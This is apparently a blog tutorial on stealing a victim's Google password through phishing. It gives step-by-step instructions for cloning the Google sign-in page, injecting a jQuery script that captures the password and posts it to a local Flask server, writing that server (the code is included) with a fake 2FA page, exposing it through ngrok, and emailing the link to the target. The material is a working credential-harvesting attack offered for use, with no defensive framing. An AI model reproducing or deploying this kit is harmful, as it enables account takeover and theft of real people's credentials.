Initially we should know about some basics of phishing attack, It is the base techinque we use here to gain password of victim
REQUIREMENTS
1)KALI LINUX
2)SUBLIME TEXT EDITOR
3)NGROK
STEP 1:
Initially use your browser and search for google sign in
Read: How to shop online without OTP
STEP 2:
Type the mail id you wanna hack, after entering the mail id and click next
STEP 3:
After entering the mail id and right click the mouse and click inspect
STEP 4:
after clicking inspect element ,go to inspector tab or element tab and right click and click the option called EDIT AS HTML,copy all html codes.
STEP 5:
paste it on sublime text editor and add some script at the end of the html tag
ill drop the code here:
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>
<script>
$('button').click(function(e){
e.preventDefault()
auth=$('input[type=password]').val()
$.post(
"http://localhost:5000/auth",
{"password":auth},
function(data, status){
window.location="http://localhost:5000/login"
}
);
return false;
})
</script>
</html>save this file as login.html
NOTE:
do it same for 2 factor authentication page
STEP 6:
next we need to write a python code that fetch deets from victim. And save it as app.py
ill give the code below
app.py
#!/usr/bin/env python3
from flask import Flask, render_template, send_file, make_response, request
app = Flask(__name__)
@app.route(“/auth”, methods=[“POST”])
def auth():
print(request.form.to_dict())
return “ok”
@app.route(“/”)
def index():
response = make_response(send_file(“templates/login.html”))
response.headers.add(“Access-Control-Allow-Origin”, “*”)
return response
@app.route(“/login”)
def login():
return send_file(“templates/2fa.html”)
if __name__ == “__main__”:
app.run()
STEP 7:
open terminal in linux and type as i did and configure the ngrok
ngrok command
STEP 8:
And send the link in mail to victim, BOOM…….!!!! youve got a password
